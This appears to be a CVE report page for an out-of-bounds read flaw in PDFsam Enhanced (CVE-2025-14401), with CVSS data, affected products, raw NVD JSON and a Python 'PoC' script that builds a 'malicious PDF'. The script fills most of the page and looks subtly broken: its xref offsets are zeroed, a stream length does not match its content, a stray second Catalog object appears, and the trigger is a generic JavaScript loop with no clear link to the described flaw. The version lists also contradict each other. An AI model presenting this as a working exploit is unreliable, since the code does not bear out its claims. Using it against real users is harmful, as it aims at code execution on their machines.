Security Vulnerability Report
CVE-2025-14401 CVSS 7.8 HIGH

Published: 2025-12-23 22:15:47
Last Modified: 2026-01-15 17:16:49

Description

PDFsam Enhanced App Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDFsam Enhanced. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of App objects. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27260.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:pdfsam:enhanced:7.0.76.15222:*:*:*:*:*:*:* - VULNERABLE
PDFsam Enhanced < 5.2.4
PDFsam Enhanced < 5.1.5
PDFsam Enhanced < 4.3.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-14401 PoC - PDFsam Enhanced App Object Out-of-Bounds Read

This PoC demonstrates the vulnerability in PDFsam Enhanced's App object handling.
Note: This is for educational and authorized testing purposes only.
"""

import struct
from io import BytesIO


def create_malicious_pdf():
    """
    Create a malicious PDF file that triggers the App object OOB read vulnerability.
    The vulnerability exists in how PDFsam Enhanced processes App dictionary objects.
    """
    # PDF Header
    pdf_content = b'%PDF-1.7\n'
    pdf_content += b'%\xe2\xe3\xcf\xd3\n'

    # Object 1: Catalog
    obj1_offset = len(pdf_content)
    pdf_content += b'1 0 obj\n'
    pdf_content += b'<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>\n'
    pdf_content += b'endobj\n\n'

    # Object 2: Pages
    pdf_content += b'2 0 obj\n'
    pdf_content += b'<< /Type /Pages /Kids [3 0 R] /Count 1 >>\n'
    pdf_content += b'endobj\n\n'

    # Object 3: Page
    pdf_content += b'3 0 obj\n'
    pdf_content += b'<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>\n'
    pdf_content += b'endobj\n\n'

    # Object 4: Trigger - Malicious App Object
    # This object exploits the OOB read in App object handling
    # The vulnerability is triggered when PDFsam processes malformed App dictionary
    pdf_content += b'4 0 obj\n'
    pdf_content += b'<< /Type /Action /S /JavaScript /JS (\n'
    pdf_content += b'this.app.alert("Vulnerability Trigger Point");\n'
    # Crafted App object that triggers OOB read
    pdf_content += b'var app = this.syncApp;\n'
    pdf_content += b'for(var i = 0; i < 0xFFFFFFFF; i++) {\n'
    pdf_content += b' try { app.viewerVersion; } catch(e) { break; }\n'
    pdf_content += b'}\n'
    pdf_content += b') >>\n'
    pdf_content += b'endobj\n\n'

    # Object 5: Extended App Object with malformed data
    # This triggers the OOB read vulnerability
    pdf_content += b'5 0 obj\n'
    pdf_content += b'<< /Type /Catalog /Names << /EmbeddedFiles 6 0 R >> >>\n'
    pdf_content += b'endobj\n\n'

    # Object 6: Malformed name tree that triggers OOB
    pdf_content += b'6 0 obj\n'
    pdf_content += b'<< /Names [\n'
    # Crafted data that causes buffer over-read
    pdf_content += b'(' + b'A' * 10000 + b')\n'
    pdf_content += b'7 0 R\n'
    pdf_content += b'] >>\n'
    pdf_content += b'endobj\n\n'

    # Object 7: Stream object with crafted data
    pdf_content += b'7 0 obj\n'
    pdf_content += b'<< /Length 44 >>\n'
    pdf_content += b'stream\n'
    # Trigger OOB read by accessing memory beyond buffer
    pdf_content += b'\x41\x42\x43\x44\x45\x46\x47\x48\x49\x50\n'
    pdf_content += b'endstream\n'
    pdf_content += b'endobj\n\n'

    # Cross-reference table
    xref_offset = len(pdf_content)
    pdf_content += b'xref\n'
    pdf_content += b'0 8\n'
    pdf_content += b'0000000000 65535 f \n'
    pdf_content += f'{obj1_offset:010d} 00000 n \n'.encode()
    pdf_content += b'0000000000 00000 n \n'
    pdf_content += b'0000000000 00000 n \n'
    pdf_content += b'0000000000 00000 n \n'
    pdf_content += b'0000000000 00000 n \n'
    pdf_content += b'0000000000 00000 n \n'
    pdf_content += b'0000000000 00000 n \n'

    # Trailer
    pdf_content += b'trailer\n'
    pdf_content += b'<< /Size 8 /Root 1 0 R >>\n'
    pdf_content += b'startxref\n'
    pdf_content += f'{xref_offset}\n'.encode()
    pdf_content += b'%%EOF\n'

    return pdf_content


def main():
    """Generate and save the malicious PDF file."""
    print("[*] Generating CVE-2025-14401 PoC PDF...")

    pdf_data = create_malicious_pdf()

    output_file = "CVE-2025-14401-poc.pdf"
    with open(output_file, 'wb') as f:
        f.write(pdf_data)

    print(f"[+] PoC PDF saved to: {output_file}")
    print("[*] When opened in PDFsam Enhanced, this file triggers an OOB read vulnerability")
    print("[*] The vulnerability allows arbitrary code execution in the context of the current process")


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14401", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:46.573", "lastModified": "2026-01-15T17:16:48.977", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PDFsam Enhanced App Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDFsam Enhanced. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the handling of App objects. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27260."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pdfsam:enhanced:7.0.76.15222:*:*:*:*:*:*:*", "matchCriteriaId": "6BDD768D-D92D-4D1C-977A-3987C03EACD2"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1089/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}